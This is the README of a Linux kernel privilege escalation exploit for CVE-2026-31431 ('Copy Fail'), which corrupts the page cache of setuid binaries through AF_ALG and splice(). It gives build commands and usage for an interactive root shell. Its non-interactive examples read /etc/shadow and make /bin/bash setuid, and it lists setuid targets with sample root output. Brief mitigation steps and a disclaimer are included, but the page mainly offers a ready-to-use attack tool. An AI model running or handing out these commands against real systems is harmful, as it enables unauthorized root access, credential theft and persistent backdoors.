## https://sploitus.com/exploit?id=3A42E818-93C4-5256-922A-182699A8CA14
# CVE-2026-31431 Copy Fail Exploit
A Linux kernel page cache contamination vulnerability exploit tool, supporting non-interactive command execution. ## Vulnerability Overview
CVE-2026-31431 is a logical flaw in the Linux kernel, present in the implementation of the `authencesn` AEAD algorithm. Through the `AF_ALG` and `splice()` system call chains, an attacker can write 4-byte data into the page cache of any readable file. **Impact Scope:**
- Linux kernel 4.14+ (2017 โ April 2026)
- Almost all mainstream distributions: Ubuntu, Debian, CentOS, RHEL, Amazon Linux, etc.
**Vulnerability Characteristics:**
- 100% reliable, no race conditions required
- No need for kernel offset calculations
- The same binary file works on all distributions
- Does not modify disk files, only contaminates memory cache
## File Description
```
. โโโ copyfail_universal.c # Main POC source code (statically compiled, no libc dependencies)
โโโ copyfail_universal # Compiled binary file
โโโ run_cmd.sh # Non-interactive wrapper script
โโโ Makefile # Compilation script
โโโ README.md # Documentation
```
## Compilation
```bash
# Method 1: Using gcc and ld
gcc -c copyfail_universal.c -o copyfail_universal.o -O2 -fno-stack-protector -fno-pic -fno-pie
ld copyfail_universal.o -o copyfail_universal -static -nostdlib
chmod +x copyfail_universal
# Method 2: Using Makefile
make
```
## Usage
### Interactive Root Shell
```bash
./copyfail_universal
```
### Non-interactive Command Execution
```bash
# Method 1: Using the wrapper script (Recommended)
./run_cmd.sh "id"
./run_cmd.sh "cat /etc/shadow"
./run_cmd.sh "chmod 4777 /bin/bash"
# Method 2: Through pipes
echo 'id > /tmp/pwned.txt; exit' | ./copyfail_universal
# Method 3: Using environment variables
CMD='whoami' ./copyfail_universal
```
### Specifying Other Setuid Targets
```bash
# Default target is /usr/bin/su
# Other targets can be specified by modifying the path variable in the source code
# Common available targets:
# /usr/bin/su
# /usr/bin/passwd
# /usr/bin/chsh
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/pkexec
```
## Automatic Recovery
The vulnerability only modifies the page cache; disk files are not modified. The following command can restore the situation:
```bash
sync; echo 3 > /proc/sys/vm/drop_caches
```
The `run_cmd.sh` script includes an automatic recovery feature. ## Example Output
```
$ ./run_cmd.sh "id"
[*] CVE-2026-31431 Copy Fail Exploit
[*] Target: /usr/bin/su
[*] Mode: Interactive shell
[*] Payload size: 112 bytes
[*] Contaminating page cache... [+] Done! Executing su... uid=0(root) gid=1000(user) groups=1000(user),4(adm),27(sudo)
```
## Affected Setuid Programs
| Program | Path | Availability |
|--------|------|------------|
| su | /usr/bin/su | โ Default |
| passwd | /usr/bin/passwd | โ |
| chsh | /usr/bin/chsh | โ |
| chfn | /usr/bin/chfn | โ |
| gpasswd | /usr/bin/gpasswd | โ |
| pkexec | /usr/bin/pkexec | โ |
| mount | /bin/mount | โ |
| umount | /bin/umount | โ |
Find all setuid programs on the system:
```bash
find / -perm -4000 -user root -type f 2>/dev/null
```
## Fix Suggestions
1. **Update the kernel** โ Upgrade to a kernel version that includes the patch `a664bf3d603d`.
2. **Temporary Mitigation** โ Disable the `algif_aead` module:
```bash
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
```
3. **Container Environments** โ Use seccomp to prevent `AF_ALG` socket creation.
## Technical Details
- **Vulnerability Type**: Page cache out-of-bounds write
- **Root Cause**: `authencesn` uses a target buffer as temporary storage, allowing 4-byte writes beyond the boundary
- **Exploitation Method**: Passes the page cache to the crypto subsystem via `splice()`
- **Write Capability**: 4 bytes can be written to the page cache of any readable file per operation
## Disclaimer
This tool is intended for security research and authorized testing purposes only. Using this tool to attack unauthorized systems is illegal. Users must bear all legal responsibilities. ## References
- [CVE-2026-31431 Write-up](https://copy.fail/)
- [Xint Blog - Copy Fail](https://xint.io/blog/copy-fail-linux-distributions)
- [GitHub - Official POC](https://github.com/theori-io/copy-fail-CVE-2026-31431)